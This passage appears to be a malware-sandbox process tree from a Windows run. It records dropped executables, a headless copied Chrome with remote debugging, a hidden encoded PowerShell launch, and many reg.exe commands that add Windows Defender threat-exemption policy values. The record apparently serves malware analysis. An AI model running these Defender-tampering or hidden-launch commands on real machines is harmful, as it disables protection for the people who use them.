        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\toc4ca48d47-af6d-4ddc-8c86-920e243f7167 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\toc4ca48d47-af6d-4ddc-8c86-920e243f7167\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=102.0.5005.63 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x73338518,0x73338528,0x73338534
        11⤵
        Executes dropped EXE
        
        PID:4176
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --enable-logging --headless --log-level=0 --use-angle=swiftshader-webgl --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4; rv:101.0) Gecko/20100101 Firefox/101.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --enable-logging --log-level=0 --mojo-platform-channel-handle=1388 --field-trial-handle=1528,i,757660741731091105,4419644141235165509,131072 --disable-features=PaintHolding /prefetch:2
        11⤵
        Executes dropped EXE
        
        PID:2824
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4; rv:101.0) Gecko/20100101 Firefox/101.0" --enable-logging --log-level=0 --mojo-platform-channel-handle=1676 --field-trial-handle=1528,i,757660741731091105,4419644141235165509,131072 --disable-features=PaintHolding /prefetch:8
        11⤵
        Executes dropped EXE
        
        PID:3508
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4; rv:101.0) Gecko/20100101 Firefox/101.0" --lang=en-US --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9461 --test-type=webdriver --allow-pre-commit-input --enable-blink-features=ShadowDOMV0 --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1884 --field-trial-handle=1528,i,757660741731091105,4419644141235165509,131072 --disable-features=PaintHolding /prefetch:1
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5616
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4; rv:101.0) Gecko/20100101 Firefox/101.0" --lang=en-US --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9461 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2700 --field-trial-handle=1528,i,757660741731091105,4419644141235165509,131072 --disable-features=PaintHolding /prefetch:1
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3668
        
        C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
        
        "C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4; rv:101.0) Gecko/20100101 Firefox/101.0" --lang=en-US --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9461 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2864 --field-trial-handle=1528,i,757660741731091105,4419644141235165509,131072 --disable-features=PaintHolding /prefetch:1
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1756
      4⤵
      Program crash
      PID:3268
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1816
      4⤵
      Program crash
      PID:3032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1016
      4⤵
      Program crash
      PID:4908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1208
      4⤵
      Program crash
      PID:3312
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1636
      4⤵
      Program crash
      PID:2100
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1632
      4⤵
      Program crash
      PID:3620
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1812
      4⤵
      Program crash
      PID:1168
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1616
      4⤵
      Program crash
      PID:1252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1736
      4⤵
      Program crash
      PID:4332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1636
      4⤵
      Program crash
      PID:1900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1652
      4⤵
      Program crash
      PID:4796
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1684
      4⤵
      Program crash
      PID:212
  - - C:\Users\Admin\AppData\Local\Temp\wYuEP7yf\YH9UD8kMJQ.exe
      C:\Users\Admin\AppData\Local\Temp\wYuEP7yf\YH9UD8kMJQ.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:740
    - - C:\Users\Admin\AppData\Local\Temp\is-8QHIJ.tmp\is-TE35S.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8QHIJ.tmp\is-TE35S.tmp" /SL4 $80390 "C:\Users\Admin\AppData\Local\Temp\wYuEP7yf\YH9UD8kMJQ.exe" 1931278 48640
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:4664
      - C:\Program Files (x86)\BRngBackup\SyncBackupShell.exe
        
        "C:\Program Files (x86)\BRngBackup\SyncBackupShell.exe"
        6⤵
        
        PID:4496
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1744
      4⤵
      Program crash
      PID:1900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1812
      4⤵
      Program crash
      PID:3876
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1580
      4⤵
      Program crash
      PID:1492
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1456
      4⤵
      Program crash
      PID:2288
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1208
      4⤵
      Program crash
      PID:4684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1748
      4⤵
      Program crash
      PID:3444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1632
      4⤵
      Program crash
      PID:3716
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1560
      4⤵
      Program crash
      PID:3560
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1204
      4⤵
      Program crash
      PID:4148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1624
      4⤵
      Program crash
      PID:2760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1516
      4⤵
      Program crash
      PID:5052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 140
      4⤵
      Program crash
      PID:1992
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" pause ImageComparer44
    3⤵
    PID:3624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 pause ImageComparer44
      4⤵
      PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2232 -ip 2232
1⤵
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2232 -ip 2232
1⤵
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2232 -ip 2232
1⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3160 -ip 3160
1⤵
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3160 -ip 3160
1⤵
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3160 -ip 3160
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3160 -ip 3160
1⤵
PID:3032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3160 -ip 3160
1⤵
PID:3756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3160 -ip 3160
1⤵
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3160 -ip 3160
1⤵
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3160 -ip 3160
1⤵
PID:1784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3160 -ip 3160
1⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3160 -ip 3160
1⤵
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3160 -ip 3160
1⤵
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3160 -ip 3160
1⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3160 -ip 3160
1⤵
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3160 -ip 3160
1⤵
PID:4624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3160 -ip 3160
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3160 -ip 3160
1⤵
PID:2596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3160 -ip 3160
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3160 -ip 3160
1⤵
PID:3032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3160 -ip 3160
1⤵
PID:3756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3160 -ip 3160
1⤵
PID:3944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3160 -ip 3160
1⤵
PID:640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3160 -ip 3160
1⤵
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3160 -ip 3160
1⤵
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3160 -ip 3160
1⤵
PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3160 -ip 3160
1⤵
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3160 -ip 3160
1⤵
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3160 -ip 3160
1⤵
PID:1960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3160 -ip 3160
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3160 -ip 3160
1⤵
PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3160 -ip 3160
1⤵
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3160 -ip 3160
1⤵
PID:2352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4828
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:1984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3160 -ip 3160
1⤵
PID:3980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3160 -ip 3160
1⤵
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3160 -ip 3160
1⤵
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3160 -ip 3160
1⤵
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3160 -ip 3160
1⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3160 -ip 3160
1⤵
PID:4048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3160 -ip 3160
1⤵
PID:2100

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3160 -ip 3160
1⤵
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3160 -ip 3160
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3160 -ip 3160
1⤵
PID:2856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3160 -ip 3160
1⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3160 -ip 3160
1⤵
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3160 -ip 3160
1⤵
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3160 -ip 3160
1⤵
PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3160 -ip 3160
1⤵
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3160 -ip 3160
1⤵
PID:4940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3160 -ip 3160
1⤵
PID:2716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3160 -ip 3160
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3160 -ip 3160
1⤵
PID:5108

C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\WGazEahxDSJaqMe\QcWrpBr.exe
C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\WGazEahxDSJaqMe\QcWrpBr.exe cw /site_id 690689 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4088
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5900
